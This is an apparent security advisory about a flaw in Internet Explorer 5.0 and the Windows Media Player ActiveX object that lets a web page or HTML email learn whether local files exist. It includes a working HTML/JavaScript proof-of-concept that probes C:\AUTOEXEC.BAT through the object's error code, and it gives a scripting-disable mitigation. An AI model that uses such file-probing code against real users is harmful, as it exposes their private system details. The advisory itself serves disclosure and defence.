COMMAND

    IE 5.0 and Windows Media Player ActiveX

SYSTEMS AFFECTED

    Win systems

PROBLEM

    Georgi Guninski found following.  IE 5.0 and Windows Media  Player
    ActiveX object  allow checking  the existence  of local  files and
    directories.

    Internet Explorer 5.0 under  Windows 95 (guess other  versions are
    affected) and Windows Media  Player ActiveX object allow  checking
    the existence of local files and directories.  This  vulnerability
    may be exploited by HTML email or news group posting.

    The problem  is an  error code  returned by  Windows Media  Player
    ActiveX object  when a  file is  attempted to  be opened.  Windows
    Media Player  ActiveX object  returns "-2147220970"  error in  the
    ErrorCode property when a file or directory does not exist but  is
    tried to be opened.  The code is:

        <object id="wm" WIDTH=0 HEIGHT=0 classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
        </object>
        <SCRIPT>
        // -2147220970
        function checkfile()
        {
        b=document.all.wm;
        b.FileName=document.forms[0].elements[0].value;
        if (b.ErrorCode == -2147220970)
         alert("File does not exist")
        else
         alert("File exists");
        }
        </SCRIPT>
        <FORM>
        <INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60>
        <INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()">
        </FORM>

    Demonstration is available at

        http://www.nat.bg/~joro/mscheckf.html

SOLUTION

    Disable Active Scripting or Disable Script ActiveX Controls marked
    Safe for Scripting.